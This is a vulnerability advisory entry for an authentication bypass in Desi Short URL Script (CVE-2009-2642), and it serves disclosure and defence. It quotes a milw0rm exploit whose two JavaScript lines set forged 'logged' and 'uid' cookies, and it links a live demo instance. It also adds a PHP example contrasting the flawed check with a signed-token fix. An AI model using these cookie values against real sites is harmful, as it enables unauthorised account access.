Desi Short URL Script Authentication Bypass Vulnerability

Vulnerability ID: 1117938 Vulnerability type: Authorization issue
Published: 2009-06-10 Updated: 2009-06-10
CVE ID: CVE-2009-2642 CNNVD-ID: CNNVD-200907-403
Platform: PHP CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/8925
https://www.securityfocus.com/bid/44415
https://cxsecurity.com/issue/WLB-2009070056
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-403
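|Vulnerability Details
index.php in Desi Short URL Script contains an authentication bypass vulnerability. A remote attacker can bypass authentication by setting the logged cookie to 1 and the uid cookie to an integer value, such as 13.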
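
The flaw described above comes down to the login decision resting on cookie values the client controls. The PHP sketch below is an added example, not code from Desi Short URL Script: every function name and the "uid.expiry.mac" token format are assumptions, and the naive check is a hypothetical reconstruction of the behaviour the description implies, shown beside an HMAC-bound alternative.

```php
<?php
// Added illustration; not the script's actual source. All names are hypothetical.

// Hypothetical reconstruction of the flawed pattern: the login decision rests
// entirely on values the browser can set itself.
function is_logged_in_naive(array $cookies): ?int
{
    if (($cookies['logged'] ?? '') === '1' && ctype_digit($cookies['uid'] ?? '')) {
        return (int) $cookies['uid'];   // any uid the client claims is accepted
    }
    return null;
}

// Hardened form: the server issues "uid.expiry.mac" after a real login, and
// only a holder of the server-side key can produce a valid mac.
function issue_token(int $uid, string $key, int $now, int $ttl = 3600): string
{
    $payload = $uid . '.' . ($now + $ttl);
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

function verify_token(string $token, string $key, int $now): ?int
{
    $parts = explode('.', $token);
    if (count($parts) !== 3 || !ctype_digit($parts[0]) || !ctype_digit($parts[1])) {
        return null;                    // malformed, e.g. a bare "13"
    }
    [$uid, $expiry, $mac] = $parts;
    $expected = hash_hmac('sha256', $uid . '.' . $expiry, $key);
    if (!hash_equals($expected, $mac) || (int) $expiry < $now) {
        return null;                    // forged, tampered or expired
    }
    return (int) $uid;
}

// Constructed sample input: the cookie values named in the description.
$key    = random_bytes(32);             // server-side secret, never sent to the client
$now    = time();
$forged = ['logged' => '1', 'uid' => '13'];
$token  = issue_token(13, $key, $now);

var_dump(is_logged_in_naive($forged));                        // client-set cookies
var_dump(verify_token($forged['uid'], $key, $now));           // same value, no mac
var_dump(verify_token($token, $key, $now));                   // server-issued token
var_dump(verify_token('14' . substr($token, 2), $key, $now)); // uid edited by client
```

PHP's built-in server-side sessions give the same property by keeping the login state on the server and sending the client only a random identifier.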
|Exploit
Desi Short URL  Insecure Cookie Handling Vulnerability
Discovered By:N@bilX
Home:ma-exploit.com /m4r0c-s3curity.cc
email:eyx@hotmail.com
Not: jib L3az Wla Khaz [ma]
--------------------
download:http://webscripts.softpedia.com/script/Miscellaneous/Desi-Short-Url-Script-42484.html
exploit:
***
javascript:document.cookie = "logged =1";
javascript:document.cookie = "uid = 13";
-----------------
demo:http://www.desiscripts.com/demo/URL/index.php

# milw0rm.com [2009-06-10]
|Affected Products
Desi Scripts Desi Short URL Script 1.0
|References

Source: MILW0RM
Name: 8925
Link: http://www.milw0rm.com/exploits/8925